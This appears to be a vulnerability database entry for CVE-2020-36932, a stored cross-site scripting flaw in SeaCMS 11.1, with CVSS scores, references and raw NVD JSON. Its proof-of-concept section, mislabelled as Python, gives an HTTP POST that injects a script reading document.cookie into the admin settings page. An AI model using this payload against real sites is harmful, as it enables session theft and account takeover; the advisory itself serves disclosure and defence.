CVE-2020-36932

Description

SeaCMS 11.1 contains a stored cross-site scripting vulnerability in the checkuser parameter of the admin settings page. Attackers can inject malicious JavaScript payloads that will execute in users' browsers when the page is loaded.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:seacms:seacms:11.1:*:*:*:*:*:*:* - VULNERABLE

SeaCMS 11.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

POST /admin/settings.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

checkuser=<script>alert(document.cookie)</script>&submit=Save

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36932
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36932
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36932/
[4] VulDB https://vuldb.com/cve/CVE-2020-36932
[5] https://www.exploit-db.com/exploits/49251
[6] https://www.seacms.net/
[7] https://www.vulncheck.com/advisories/seacms-checkuser-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36932", "sourceIdentifier": "[email protected]", "published": "2026-01-25T13:15:59.560", "lastModified": "2026-02-02T16:16:14.143", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "SeaCMS 11.1 contains a stored cross-site scripting vulnerability in the checkuser parameter of the admin settings page. Attackers can inject malicious JavaScript payloads that will execute in users' browsers when the page is loaded."}, {"lang": "es", "value": "SeaCMS 11.1 contiene una vulnerabilidad de cross-site scripting almacenado en el parámetro checkuser de la página de configuración de administrador. Los atacantes pueden inyectar cargas útiles de JavaScript maliciosas que se ejecutarán en los navegadores de los usuarios cuando se cargue la página."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seacms:seacms:11.1:*:*:*:*:*:*:*", "matchCriteriaId": "34F1831F-F565-4BF9-ADB4-ABC349FB879B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49251", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.seacms.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/seacms-checkuser-stored-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}